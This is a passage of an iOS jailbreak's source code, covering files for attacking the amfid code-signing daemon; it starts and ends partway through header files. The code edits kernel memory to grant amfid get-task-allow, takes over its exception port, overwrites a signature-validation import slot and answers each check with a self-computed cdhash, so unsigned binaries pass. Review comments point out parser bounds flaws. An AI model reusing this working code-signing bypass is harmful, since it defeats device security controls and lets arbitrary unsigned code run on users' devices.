typedef struct {
    mach_msg_header_t Head;
    mach_msg_body_t msgh_body;
    mach_msg_port_descriptor_t thread;
    mach_msg_port_descriptor_t task;
    NDR_record_t NDR;
} exception_raise_request; // the bits we need at least
/* Reply sent back for an exception-raise request. */
typedef struct {
    mach_msg_header_t Head;
    NDR_record_t NDR;
    kern_return_t RetCode;
} exception_raise_reply;
#pragma pack()
/* Fixed offset, added to amfid's load address in patchAMFID(), of the slot
 * that is read and then overwritten there.
 * NOTE(review): hard-coded; presumably valid for one specific amfid build only. */
#define amfid_MISValidateSignatureAndCopyInfo_import_offset 0x4150
================================================
FILE: AMFI Utilities/amfid.m
================================================
// From JelbrekLib, by Jake James!
#import "../AMFI Utilities/amfid.h"
#import "../AMFI Utilities/amfid_mem.h"
#import "../AMFI Utilities/amfi_utils.h"
#import "../AMFI Utilities/amfid_tools.h"
#import "../Kernel Utilities/kernel_utils.h"
#import "../AMFI Utilities/cs_blob.h"
#import "../Exploits/sock_port/offsetof.h"
#import <Foundation/Foundation.h>
#include "../PatchFinder/patchfinder64.h"
#include "../AMFI Utilities/osobject.h"
#include "../Blizzard Jailbreak/blizzardJailbreak.h"
// Thread created by setAmfidExceptionHandler() to run the exception handler.
pthread_t exceptionThread;
// Receive right on which exception messages from the target task arrive.
static mach_port_name_t AMFID_ExceptionPort = MACH_PORT_NULL;
// Value read from the import slot by patchAMFID() before it is overwritten.
uint64_t origAMFID_MISVSACI = 0;
// Load address of the target task as reported by binary_load_address().
uint64_t amfid_base_old;
/*
 * Add the boolean entitlement `ent` to the entitlement dictionary of process
 * `pid`, edited in place in kernel memory.
 *
 * Returns NO when pid is 0 or when the key still reads back as 0 after the
 * write; YES when the key was already present (it is then left untouched,
 * whatever `val` says) or was set.
 *
 * NOTE(review): none of the intermediate kernel pointers (proc, ucred,
 * cr_label, entitlements) is checked for 0 before the next read.
 */
BOOL entitlePidOnAMFI(pid_t pid, const char *ent, BOOL val) {
    if (!pid) return NO;
    // Walk proc -> ucred -> cr_label -> AMFI slot using the offsets from offsetof.h.
    uint64_t proc = proc_of_pid(pid);
    uint64_t ucred = rk64(proc + off_p_ucred);
    uint64_t cr_label = rk64(ucred + off_ucred_cr_label);
    uint64_t entitlements = rk64(cr_label + off_amfi_slot);
    // Only act when the key is currently absent.
    if (OSDictionary_GetItem(entitlements, ent) == 0) {
        printf("AMFI TOOLS: Setting Entitlements...\n");
        uint64_t entval = OSDictionary_GetItem(entitlements, ent);
        printf("AMFI TOOLS: before: %s is 0x%llx\n", ent, entval);
        OSDictionary_SetItem(entitlements, ent, (val) ? Find_OSBoolean_True() : Find_OSBoolean_False());
        // Read back to confirm the item is now present.
        entval = OSDictionary_GetItem(entitlements, ent);
        printf("AMFI TOOLS: after: %s is 0x%llx\n", ent, entval);
        return (entval) ? YES : NO;
    }
    return YES;
}
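/*
 * Return the start address of the first VM region of task `tp`, which the
 * callers treat as the load address of its main binary.
 *
 * On failure the function returns -1 converted to uint64_t (UINT64_MAX);
 * callers must compare against that value, since 0 is not the error value.
 *
 * The mach_vm_region() call had "&region" and "&region_count" garbled into
 * "(R)ion"-style characters by an HTML-entity decoding step; the address-of
 * operators are restored here.
 */
uint64_t binary_load_address(mach_port_t tp) {
    kern_return_t err;
    mach_msg_type_number_t region_count = VM_REGION_BASIC_INFO_COUNT_64;
    memory_object_name_t object_name = MACH_PORT_NULL; /* unused */
    mach_vm_size_t target_first_size = 0x1000;
    /* Starting the query at 0 makes mach_vm_region() report the lowest region. */
    mach_vm_address_t target_first_addr = 0x0;
    struct vm_region_basic_info_64 region = {0};
    printf("AMFI TOOLS: About to call mach_vm_region\n");
    err = mach_vm_region(tp, &target_first_addr, &target_first_size, VM_REGION_BASIC_INFO_64, (vm_region_info_t)&region, &region_count, &object_name);
    if (err != KERN_SUCCESS) {
        printf("AMFI TOOLS: Failed to get the region: %s\n", mach_error_string(err));
        return -1;
    }
    printf("AMFI TOOLS: Got base address\n");
    return target_first_addr;
}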
#if !__arm64e__
/*
 * Service loop for exception messages from the task whose exception ports
 * were redirected by setAmfidExceptionHandler(). Never returns in practice.
 *
 * For each message it reads the faulting thread's register state, reads a
 * file name through x25 and a 20-byte hash buffer through x24 from the target
 * task, and then either
 *   - resumes the thread at the saved original function (origAMFID_MISVSACI)
 *     when the hash buffer is judged non-empty, or
 *   - computes a hash from the named file on disk, writes it to the address
 *     in x24, writes 1 to the address in x20, and resumes the thread at
 *     (lr rounded down to a page) + 0x1000.
 * In the second path the hash handed back is derived from the file itself by
 * getCodeDirectory()/parse_superblob(); nothing visible here verifies a
 * signature over it.
 *
 * NOTE(review): the paths that leave an iteration early (the `continue`
 * after thread_get_state() and both `goto end`) send no reply and do not
 * release thread_port/task_port; presumably the faulting thread then stays
 * blocked. Confirm.
 */
void* AMFIDExceptionHandler(void* arg) {
    uint32_t size = 0x1000;
    // NOTE(review): malloc() result unchecked; the buffer lives for the whole loop.
    mach_msg_header_t* msg = malloc(size);
    for(;;) {
        kern_return_t ret;
        printf("AMFI TOOLS: AMFID: Calling mach_msg to receive exception message from amfid\n");
        // Block until an exception message arrives on the registered port.
        ret = mach_msg(msg, MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, 0, size, AMFID_ExceptionPort, 0, 0);
        if (ret != KERN_SUCCESS){
            printf("AMFI TOOLS: AMFID: Error receiving exception port: %s\n", mach_error_string(ret));
            continue;
        } else {
            printf("AMFI TOOLS: AMFID: Got called!\n");
            exception_raise_request* req = (exception_raise_request*)msg;
            mach_port_t thread_port = req->thread.name;
            mach_port_t task_port = req->task.name;
            _STRUCT_ARM_THREAD_STATE64 old_state = {0};
            // State count is expressed in 32-bit words.
            mach_msg_type_number_t old_stateCnt = sizeof(old_state)/4;
            ret = thread_get_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&old_state, &old_stateCnt);
            if (ret != KERN_SUCCESS){
                printf("AMFI TOOLS: Error getting thread state: %s\n", mach_error_string(ret));
                continue;
            }
            printf("AMFI TOOLS: Got thread state!\n");
            _STRUCT_ARM_THREAD_STATE64 new_state;
            memcpy(&new_state, &old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));
            // NOTE(review): AmfidRead() returns NULL on failure; both results are
            // used below without a check. The 1024-byte name copy is also not
            // guaranteed to contain a terminating NUL before it is printed.
            char* filename = (char*)AmfidRead(new_state.__x[25], 1024);
            uint8_t *orig_cdhash = (uint8_t*)AmfidRead(new_state.__x[24], CS_CDHASH_LEN);
            printf("AMFI TOOLS: Got request for: %s\n", filename);
            printf("AMFI TOOLS: Original cdhash: \n\t");
            for (int i = 0; i < CS_CDHASH_LEN; i++) {
                printf("AMFI TOOLS: Original CDHash%02x ", orig_cdhash[i]);
            }
            printf("\n");
            // NOTE(review): strlen() on a raw CS_CDHASH_LEN-byte buffer. A hash
            // whose first byte is 0 counts as "empty", and a hash without any
            // zero byte makes strlen() read past the allocation.
            if (strlen((char*)orig_cdhash)) {
                amfid_base_old = binary_load_address(task_port);
                printf("AMFI TOOLS: Jumping thread to 0x%llx\n", origAMFID_MISVSACI);
                new_state.__pc = origAMFID_MISVSACI;
            } else {
                // NOTE(review): code_directory is never freed on any path.
                uint8_t* code_directory = getCodeDirectory(filename);
                if (!code_directory) {
                    printf("AMFI TOOLS: Can't get code directory\n");
                    goto end;
                }
                uint8_t cd_hash[CS_CDHASH_LEN];
                if (parse_superblob(code_directory, cd_hash)) {
                    printf("AMFI TOOLS: parse_superblob failed\n");
                    goto end;
                }
                printf("AMFI TOOLS: New cdhash: \n\t");
                for (int i = 0; i < CS_CDHASH_LEN; i++) {
                    printf("AMFI TOOLS: CDHash%02x ", cd_hash[i]);
                }
                printf("\n");
                // This assignment is overwritten a few lines below.
                new_state.__pc = origAMFID_MISVSACI;
                // Literal 20 is used where the buffer was declared with CS_CDHASH_LEN.
                ret = mach_vm_write(task_port, old_state.__x[24], (vm_offset_t)&cd_hash, 20);
                if (ret == KERN_SUCCESS)
                {
                    printf("AMFI TOOLS: Wrote the cdhash into amfid\n");
                } else {
                    printf("AMFI TOOLS: Unable to write the cdhash into amfid!\n");
                }
                // Execution continues even if the hash write above failed.
                AmfidWrite_32bits(old_state.__x[20], 1);
                new_state.__pc = (old_state.__lr & 0xfffffffffffff000) + 0x1000; // 0x2dacwhere to continue
                printf("AMFI TOOLS: Old PC: 0x%llx, new PC: 0x%llx\n", old_state.__pc, new_state.__pc);
            }
            // NOTE(review): literal 6 is used as the flavor where thread_get_state()
            // above passes ARM_THREAD_STATE64; use the named constant.
            ret = thread_set_state(thread_port, 6, (thread_state_t)&new_state, sizeof(new_state)/4);
            if (ret != KERN_SUCCESS) {
                printf("AMFI TOOLS: Failed to set new thread state %s\n", mach_error_string(ret));
            } else {
                printf("AMFI TOOLS: Success setting new state for amfid!\n");
            }
            // Build the reply: same remote port, request id + 0x64, success code.
            exception_raise_reply reply = {0};
            reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(req->Head.msgh_bits), 0);
            reply.Head.msgh_size = sizeof(reply);
            reply.Head.msgh_remote_port = req->Head.msgh_remote_port;
            reply.Head.msgh_local_port = MACH_PORT_NULL;
            reply.Head.msgh_id = req->Head.msgh_id + 0x64;
            reply.NDR = req->NDR;
            reply.RetCode = KERN_SUCCESS;
            // Option value 1 is passed as a literal (send-only call, no receive buffer).
            ret = mach_msg(&reply.Head, 1, (mach_msg_size_t)sizeof(reply), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
            mach_port_deallocate(mach_task_self(), thread_port);
            mach_port_deallocate(mach_task_self(), task_port);
            if (ret != KERN_SUCCESS){
                printf("AMFI TOOLS: Failed to send the reply to the exception message %s\n", mach_error_string(ret));
            } else{
                printf("AMFI TOOLS: Replied to the amfid exception...\n");
            }
        end:;
            // Per-request copies from AmfidRead(); free(NULL) is harmless.
            free(filename);
            free(orig_cdhash);
        }
    }
    return NULL;
}
/*
 * Create a receive right with a send right in this task, install it as the
 * exception port for every exception type (EXC_MASK_ALL) on
 * `amfid_task_port`, and start `exceptionHandler` on a new pthread.
 *
 * Returns 0 when the port was installed and the thread was started, 1 when
 * either port is invalid or task_set_exception_ports() fails.
 *
 * NOTE(review): the results of mach_port_allocate(), mach_port_insert_right()
 * and pthread_create() are not inspected.
 */
int setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*)){
    if (!MACH_PORT_VALID(amfid_task_port)) {
        printf("AMFI TOOLS: Invalid amfid task port\n");
        return 1;
    }

    const mach_port_t self = mach_task_self();
    mach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &AMFID_ExceptionPort);
    mach_port_insert_right(self, AMFID_ExceptionPort, AMFID_ExceptionPort, MACH_MSG_TYPE_MAKE_SEND);
    if (!MACH_PORT_VALID(AMFID_ExceptionPort)) {
        printf("AMFI TOOLS: Invalid amfid exception port\n");
        return 1;
    }

    printf("AMFI TOOLS: amfid_task_port = 0x%x\n", amfid_task_port);
    printf("AMFI TOOLS: AMFID_ExceptionPort = 0x%x\n", AMFID_ExceptionPort);

    const kern_return_t status = task_set_exception_ports(amfid_task_port, EXC_MASK_ALL, AMFID_ExceptionPort, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, ARM_THREAD_STATE64);
    if (status != KERN_SUCCESS) {
        printf("AMFI TOOLS: Error setting amfid exception port: %s\n", mach_error_string(status));
        return 1;
    }

    printf("AMFI TOOLS: Success setting amfid exception port!\n");
    pthread_create(&exceptionThread, NULL, exceptionHandler, NULL);
    return 0;
}
/*
 * Redirect one import slot of the amfid process to this process's exception
 * handler. Returns the slot's original value; the error paths `return -1`,
 * which this unsigned function reports as UINT64_MAX.
 *
 * Changes made to the target, in order, as visible below. Each one is
 * observable state on a device under examination:
 *   1. the "get-task-allow" entitlement is added to amfid's entitlement
 *      dictionary and setcsflags() is applied to it;
 *   2. amfid's task port is obtained with task_for_pid();
 *   3. amfid's exception ports are replaced for all exception types;
 *   4. the 8 bytes at load address + 0x4150 are saved and then overwritten
 *      with 0x4141414141414141, presumably so that a call through the slot
 *      faults and is delivered to the exception port.
 */
uint64_t patchAMFID() {
    printf("AMFI TOOLS: Patching AMFID...\n");
    // NOTE(review): a failed lookup is not handled; the pid is used as returned.
    pid_t amfid_pid = pid_of_procName("amfid");
    printf("AMFI TOOLS: amfid's PID: %d\n", amfid_pid);
    // Return value ignored.
    entitlePidOnAMFI(amfid_pid, "get-task-allow", YES);
    setcsflags(amfid_pid);
    printf("AMFI TOOLS: Getting task port\n");
    mach_port_t amfid_task_port;
    kern_return_t kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_task_port);
    if (kr) {
        printf("AMFI TOOLS: Failed to get amfid's task :(\n\tError: %s\n", mach_error_string(kr));
        return -1;
    }
    if (!MACH_PORT_VALID(amfid_task_port)) {
        printf("AMFI TOOLS: Failed to get amfid's task port!\n");
        return -1;
    }
    printf("AMFI TOOLS: Got amfid's task port? :) 0x%x\n", amfid_task_port);
    // Remember the port for the AmfidRead()/AmfidWrite_*() helpers.
    init_amfid_mem(amfid_task_port);
    // NOTE(review): the return value is ignored, so the slot is still
    // overwritten below even if no handler was installed.
    setAmfidExceptionHandler(amfid_task_port, AMFIDExceptionHandler);
    printf("AMFI TOOLS: About to search for the binary load address\n");
    // NOTE(review): binary_load_address() returns (uint64_t)-1 on failure; not checked here.
    amfid_base_old = binary_load_address(amfid_task_port);
    printf("AMFI TOOLS: Amfid load address: 0x%llx\n", amfid_base_old);
    mach_vm_size_t sz;
    // Save the slot's current value before replacing it; `sz` is not inspected.
    kr = mach_vm_read_overwrite(amfid_task_port, amfid_base_old+amfid_MISValidateSignatureAndCopyInfo_import_offset, 8, (mach_vm_address_t)&origAMFID_MISVSACI, &sz);
    if (kr != KERN_SUCCESS) {
        printf("AMFI TOOLS: Error reading MISVSACI: %s\n", mach_error_string(kr));
        return -1;
    }
    printf("AMFI TOOLS: Original MISVSACI 0x%llx\n", origAMFID_MISVSACI);
    // AmfidWrite_64bits() only logs on failure, hence the "hopefully" below.
    AmfidWrite_64bits(amfid_base_old + amfid_MISValidateSignatureAndCopyInfo_import_offset, 0x4141414141414141);
    printf("[i] AMFI TOOLS: AMFID hopefully patched\n");
    return origAMFID_MISVSACI;
}
#endif
================================================
FILE: AMFI Utilities/amfid_mem.h
================================================
#import <stdio.h>
#import <mach-o/loader.h>
#import <stdlib.h>
#import <fcntl.h>
#import <unistd.h>
#import <errno.h>
#import <mach/mach.h>
#import <sys/stat.h>
/* Stores the task port used by every helper below; call before any of them. */
void init_amfid_mem(mach_port_t amfid_tp);
/* Returns a malloc'd copy of `len` bytes read from the target task at `addr`,
 * or NULL when the read fails. Caller frees. */
void* AmfidRead(uint64_t addr, uint64_t len);
/* Write a 1-, 8- or 4-byte value into the target task at `addr`. Failures are
 * only logged; no status is returned. */
void AmfidWrite_8bits(uint64_t addr, uint8_t val);
void AmfidWrite_64bits(uint64_t addr, uint64_t val);
void AmfidWrite_32bits(uint64_t addr, uint32_t val);
/* NOTE(review): duplicate of the AmfidRead declaration above. */
void* AmfidRead(uint64_t addr, uint64_t len);
================================================
FILE: AMFI Utilities/amfid_mem.m
================================================
#import "amfid_mem.h"
#import "kernel_utils.h"
#import <Foundation/Foundation.h>
// Task port of the target process, shared by the read/write helpers in this file.
static mach_port_t amfid_task_port;
/* Record the task port that AmfidRead() and AmfidWrite_*() operate on.
 * The port is stored as given; it is not validated here. */
void init_amfid_mem(mach_port_t amfid_tp) {
    amfid_task_port = amfid_tp;
}
/*
 * Copy `len` bytes from address `addr` in the target task into a fresh heap
 * buffer. Returns the buffer (caller frees) or NULL when mach_vm_read()
 * fails.
 *
 * NOTE(review): the malloc() result is passed to memcpy() unchecked, and the
 * copy uses `len` rather than the byte count mach_vm_read() reported.
 */
void* AmfidRead(uint64_t addr, uint64_t len) {
    vm_offset_t mapped = 0;
    mach_msg_type_number_t mapped_size = 0;
    const kern_return_t status = mach_vm_read(amfid_task_port, addr, len, &mapped, &mapped_size);
    if (status != KERN_SUCCESS) {
        printf("AMFI TOOLS: amfid read failed (0x%llx)\n", addr);
        return NULL;
    }

    uint8_t* copy = malloc(len);
    memcpy(copy, (void*)mapped, len);
    /* The kernel-provided mapping is released once its contents are copied. */
    mach_vm_deallocate(mach_task_self(), mapped, mapped_size);
    return copy;
}
/* Write the single byte `val` to `addr` in the target task. A failed write is
 * logged and otherwise ignored. */
void AmfidWrite_8bits(uint64_t addr, uint8_t val) {
    if (mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, sizeof(val)) == KERN_SUCCESS) {
        return;
    }
    printf("AMFI TOOLS: amfid write failed (0x%llx)\n", addr);
}
/* Write the 4-byte value `val` to `addr` in the target task. A failed write
 * is logged and otherwise ignored. */
void AmfidWrite_32bits(uint64_t addr, uint32_t val) {
    if (mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, sizeof(val)) == KERN_SUCCESS) {
        return;
    }
    printf("AMFI TOOLS: amfid write failed (0x%llx)\n", addr);
}
/* Write the 8-byte value `val` to `addr` in the target task. A failed write
 * is logged and otherwise ignored. */
void AmfidWrite_64bits(uint64_t addr, uint64_t val) {
    if (mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, sizeof(val)) == KERN_SUCCESS) {
        return;
    }
    printf("AMFI TOOLS: amfid write failed (0x%llx)\n", addr);
}
================================================
FILE: AMFI Utilities/amfid_tools.h
================================================
#import <stdio.h>
#import <unistd.h>
#import <sys/types.h>
#import <mach-o/loader.h>
#import <mach/error.h>
#import <errno.h>
#import <stdlib.h>
#import <dlfcn.h>
#import <mach/vm_map.h>
#import <Foundation/Foundation.h>
#import <CommonCrypto/CommonDigest.h>
#import "../AMFI Utilities/cs_blob.h"
/* NOTE(review): a `static` prototype in a header gives every including file
 * its own declaration; only amfid_tools.m defines the function. */
static unsigned int hash_rank(const CodeDirectory *cd);
/* Hashes `directory` with the algorithm named by its hashType and copies the
 * first CS_CDHASH_LEN bytes to `dst`. Returns 0 on success, 1 for a bad
 * magic, 2 for an unknown hash type. */
int get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]);
/* Picks the highest-ranked CodeDirectory in the superblob at `code_dir` and
 * stores its hash in `dst`. Returns the get_hash() result for that directory,
 * or 1 when none was hashed. */
int parse_superblob(uint8_t *code_dir, uint8_t dst[CS_CDHASH_LEN]);
================================================
FILE: AMFI Utilities/amfid_tools.m
================================================
#import "amfid_tools.h"
#import "amfi_utils.h"
#import "amfid.h"
/*
 * Rank the hash type of `cd`: returns 1 + the index of cd->hashType within
 * hashPriorities (declared outside this file), or 0 when the type is not
 * listed there. parse_superblob() prefers the directory with the largest rank.
 */
static unsigned int hash_rank(const CodeDirectory *cd){
    const uint32_t wanted = cd->hashType;
    const unsigned int total = sizeof(hashPriorities) / sizeof(hashPriorities[0]);
    unsigned int idx = 0;
    while (idx < total) {
        if (hashPriorities[idx] == wanted) {
            return idx + 1;
        }
        idx++;
    }
    return 0;
}
/*
 * Hash a CodeDirectory blob with the algorithm selected by its hashType field
 * and copy the first CS_CDHASH_LEN bytes of the digest to `dst`.
 *
 * Returns 0 on success, 1 when the blob's magic is not CSMAGIC_CODEDIRECTORY,
 * 2 when the hash type is not SHA-1, SHA-256 (plain or truncated) or SHA-384.
 *
 * NOTE(review): the number of bytes hashed is the blob's own big-endian
 * `length` field. No caller-supplied bound exists, so a crafted length makes
 * the digest routine read past the end of the buffer.
 */
int get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]) {
    if (ntohl(directory->magic) != CSMAGIC_CODEDIRECTORY) {
        printf("AMFI TOOLS: [get_hash] wtf, not CSMAGIC_CODEDIRECTORY?!\n");
        return 1;
    }

    const uint32_t blob_len = ntohl(directory->length);
    const uint8_t algo = directory->hashType;
    uint8_t digest[CS_HASH_MAX_SIZE];

    if (algo == CS_HASHTYPE_SHA1) {
        CC_SHA1(directory, blob_len, digest);
    } else if (algo == CS_HASHTYPE_SHA256 || algo == CS_HASHTYPE_SHA256_TRUNCATED) {
        CC_SHA256(directory, blob_len, digest);
    } else if (algo == CS_HASHTYPE_SHA384) {
        CC_SHA384(directory, blob_len, digest);
    } else {
        printf("AMFI TOOLS:[get_hash] Unknown hash type: 0x%x\n", algo);
        return 2;
    }

    /* Whatever the algorithm, only the leading CS_CDHASH_LEN bytes are kept. */
    memcpy(dst, digest, CS_CDHASH_LEN);
    return 0;
}
/*
 * Walk the index of the superblob at `code_dir`, and for the primary and
 * alternate CodeDirectory slots keep the hash of the directory whose hash
 * type ranks highest according to hash_rank(). The hash is written to `dst`.
 *
 * Returns the get_hash() result of the last directory selected, 1 when no
 * directory was selected, and 1 when an index entry's offset exceeds the
 * superblob's declared length.
 *
 * NOTE(review): `count`, `length` and every offset are read from the blob
 * itself. The only bound applied is offset <= declared length; nothing ties
 * the declared length or the index size to the real size of the buffer, so a
 * crafted blob can cause out-of-bounds reads here and in get_hash().
 */
int parse_superblob(uint8_t *code_dir, uint8_t dst[CS_CDHASH_LEN]) {
    const CS_SuperBlob *super = (const CS_SuperBlob *)code_dir;
    int status = 1;
    uint8_t best_rank = 0;

    for (int n = 0; n < ntohl(super->count); n++){
        const CS_BlobIndex *entry = &super->index[n];
        const uint32_t slot = ntohl(entry->type);
        const uint32_t blob_off = ntohl(entry->offset);

        if (ntohl(super->length) < blob_off) {
            printf("AMFI TOOLS: offset of blob #%d overflows superblob length\n", n);
            return 1;
        }

        const int is_primary = (slot == CSSLOT_CODEDIRECTORY);
        const int is_alternate = (slot >= CSSLOT_ALTERNATE_CODEDIRECTORIES && slot < CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT);
        if (!is_primary && !is_alternate) {
            continue;
        }

        const CodeDirectory *candidate = (const CodeDirectory *)(code_dir + blob_off);
        const uint8_t rank = hash_rank(candidate);
        if (rank <= best_rank) {
            continue;
        }
        status = get_hash(candidate, dst);
        best_rank = rank;
    }
    return status;
}
================================================
FILE: AMFI Utilities/cs_blob.h
================================================
//from: xnu osfmk/kern/cs_blobs.h
#import <mach/mach.h>
/*
 * Layout of a CodeDirectory blob as it appears in a code signature. The
 * struct is packed, so field offsets match the serialized form exactly.
 * The parsers in amfid_tools.m convert `magic` and `length` with ntohl(),
 * i.e. they read the multi-byte fields as big-endian. The zero-length
 * `end_*` members mark where the layout of each older format version ends;
 * a parser must check `version` before touching fields past such a marker.
 */
typedef struct __attribute__((packed)) {
    uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */
    uint32_t length; /* total length of CodeDirectory blob */
    uint32_t version; /* compatibility version */
    uint32_t flags; /* setup and mode flags */
    uint32_t hashOffset; /* offset of hash slot element at index zero */
    uint32_t identOffset; /* offset of identifier string */
    uint32_t nSpecialSlots; /* number of special hash slots */
    uint32_t nCodeSlots; /* number of ordinary (code) hash slots */
    uint32_t codeLimit; /* limit to main image signature range */
    uint8_t hashSize; /* size of each hash in bytes */
    uint8_t hashType; /* type of hash (cdHashType* constants) */
    uint8_t platform; /* platform identifier; zero if not platform binary */
    uint8_t pageSize; /* log2(page size in bytes); 0 => infinite */
    uint32_t spare2; /* unused (must be zero) */
    char end_earliest[0];
    /* Version 0x20100 */
    uint32_t scatterOffset; /* offset of optional scatter vector */
    char end_withScatter[0];
    /* Version 0x20200 */
    uint32_t teamOffset; /* offset of optional team identifier */
    char end_withTeam[0];
    /* Version 0x20300 */
    uint32_t spare3; /* unused (must be zero) */
    uint64_t codeLimit64; /* limit to main image signature range, 64 bits */
    char end_withCodeLimit64[0];
    /* Version 0x20400 */
    uint64_t execSegBase; /* offset of executable segment */
    uint64_t execSegLimit; /* limit of executable segment */
    uint64_t execSegFlags; /* executable segment flags */
    char end_withExecSeg[0];
} CodeDirectory;
/*
 * One entry of a SuperBlob's index table: which slot the blob occupies and
 * where it starts. The parser in this repository reads both fields through
 * ntohl(), i.e. it treats them as big-endian on disk.
 */
typedef struct __attribute__((packed)) {
    uint32_t type; /* type of entry */
    uint32_t offset; /* offset of entry */
} CS_BlobIndex;
/*
 * Container header for an embedded code signature: a fixed header followed by
 * `count` index entries, then the blobs themselves.
 *
 * NOTE(review): every field comes straight from the file being parsed. A
 * consumer should bound `count` and each index[n].offset (plus the size of the
 * structure it is about to read there) against `length` before dereferencing.
 */
typedef struct __attribute__((packed)) {
    uint32_t magic; /* magic number */
    uint32_t length; /* total length of SuperBlob */
    uint32_t count; /* number of index entries following */
    CS_BlobIndex index[]; /* (count) entries */
    /* followed by Blobs in no particular order as indicated by offsets in index */
} CS_SuperBlob;
typedef struct __SC_Scatter {
uint32_t count; // number of pages; zero for sentinel (only)
uint32_t base; // first page number
uint64_t targetOffset; // offset in target
uint64_t spare; // reserved
} SC_Scatter;
/*
* Magic numbers used by Code Signing
*/
enum {
CSMAGIC_REQUIREMENT = 0xfade0c00, /* single Requirement blob */
CSMAGIC_REQUIREMENTS = 0xfade0c01, /* Requirements vector (internal requirements) */
CSMAGIC_CODEDIRECTORY = 0xfade0c02, /* CodeDirectory blob */
CSMAGIC_EMBEDDED_SIGNATURE = 0xfade0cc0, /* embedded form of signature data */
CSMAGIC_EMBEDDED_SIGNATURE_OLD = 0xfade0b02, /* XXX */
CSMAGIC_EMBEDDED_ENTITLEMENTS = 0xfade7171, /* embedded entitlements */
CSMAGIC_DETACHED_SIGNATURE = 0xfade0cc1, /* multi-arch collection of embedded signatures */
CSMAGIC_BLOBWRAPPER = 0xfade0b01, /* CMS Signature, among other things */
CS_SUPPORTSSCATTER = 0x20100,
CS_SUPPORTSTEAMID = 0x20200,
CS_SUPPORTSCODELIMIT64 = 0x20300,
CS_SUPPORTSEXECSEG = 0x20400,
CSSLOT_CODEDIRECTORY = 0, /* slot index for CodeDirectory */
CSSLOT_INFOSLOT = 1,
CSSLOT_REQUIREMENTS = 2,
CSSLOT_RESOURCEDIR = 3,
CSSLOT_APPLICATION = 4,
CSSLOT_ENTITLEMENTS = 5,
CSSLOT_ALTERNATE_CODEDIRECTORIES = 0x1000, /* first alternate CodeDirectory, if any */
CSSLOT_ALTERNATE_CODEDIRECTORY_MAX = 5, /* max number of alternate CD slots */
CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT = CSSLOT_ALTERNATE_CODEDIRECTORIES + CSSLOT_ALTERNATE_CODEDIRECTORY_MAX, /* one past the last */
CSSLOT_SIGNATURESLOT = 0x10000, /* CMS Signature */
CSTYPE_INDEX_REQUIREMENTS = 0x00000002, /* compat with amfi */
CSTYPE_INDEX_ENTITLEMENTS = 0x00000005, /* compat with amfi */
CS_HASHTYPE_SHA1 = 1,
CS_HASHTYPE_SHA256 = 2,
CS_HASHTYPE_SHA256_TRUNCATED = 3,
CS_HASHTYPE_SHA384 = 4,
CS_SHA1_LEN = 20,
CS_SHA256_LEN = 32,
CS_SHA256_TRUNCATED_LEN = 20,
CS_CDHASH_LEN = 20, /* always - larger hashes are truncated */
CS_HASH_MAX_SIZE = 48, /* max size of the hash we'll support */
/*
* Currently only to support Legacy VPN plugins,
* but intended to replace all the various platform code, dev code etc. bits.
*/
CS_SIGNER_TYPE_UNKNOWN = 0,
CS_SIGNER_TYPE_LEGACYVPN = 5,
};
/*
* Choose among different hash algorithms.
* Higher is better, 0 => don't use at all.
*/
static const uint32_t hashPriorities[] = {
CS_HASHTYPE_SHA1,
CS_HASHTYPE_SHA256_TRUNCATED,
CS_HASHTYPE_SHA256,
CS_HASHTYPE_SHA384,
};
typedef struct __SC_GenericBlob {
uint32_t magic; /* magic number */
uint32_t length; /* total length of blob */
char data[];
} CS_GenericBlob;
/*
* C form of a CodeDirectory.
*/
typedef struct __CodeDirectory {
uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */
uint32_t length; /* total length of CodeDirectory blob */
uint32_t version; /* compatibility version */
uint32_t flags; /* setup and mode flags */
uint32_t hashOffset; /* offset of hash slot element at index zero */
uint32_t identOffset; /* offset of identifier string */
uint32_t nSpecialSlots; /* number of special hash slots */
uint32_t nCodeSlots; /* number of ordinary (code) hash slots */
uint32_t codeLimit; /* limit to main image signature range */
uint8_t hashSize; /* size of each hash in bytes */
uint8_t hashType; /* type of hash (cdHashType* constants) */
uint8_t platform; /* platform identifier; zero if not platform binary */
uint8_t pageSize; /* log2(page size in bytes); 0 => infinite */
uint32_t spare2; /* unused (must be zero) */
char end_earliest[0];
/* Version 0x20100 */
uint32_t scatterOffset; /* offset of optional scatter vector */
char end_withScatter[0];
/* Version 0x20200 */
uint32_t teamOffset; /* offset of optional team identifier */
char end_withTeam[0];
/* Version 0x20300 */
uint32_t spare3; /* unused (must be zero) */
uint64_t codeLimit64; /* limit to main image signature range, 64 bits */
char end_withCodeLimit64[0];
/* Version 0x20400 */
uint64_t execSegBase; /* offset of executable segment */
uint64_t execSegLimit; /* limit of executable segment */
uint64_t execSegFlags; /* executable segment flags */
char end_withExecSeg[0];
/* followed by dynamic content as located by offset fields above */
} CS_CodeDirectory
__attribute__ ((aligned(1)));
#define CS_OPS_ENTITLEMENTS_BLOB 7 /* get entitlements blob */
int csops(pid_t pid, unsigned int ops, void *useraddr, size_t usersize);
struct cs_blob {
struct cs_blob *csb_next;
cpu_type_t csb_cpu_type;
unsigned int csb_flags;
off_t csb_base_offset; /* Offset of Mach-O binary in fat binary */
off_t csb_start_offset; /* Blob coverage area start, from csb_base_offset */
off_t csb_end_offset; /* Blob coverage area end, from csb_base_offset */
vm_size_t csb_mem_size;
vm_offset_t csb_mem_offset;
vm_address_t csb_mem_kaddr;
unsigned char csb_cdhash[CS_CDHASH_LEN];
const struct cs_hash *csb_hashtype;
vm_size_t csb_hash_pagesize; /* each hash entry represent this many bytes in the file */
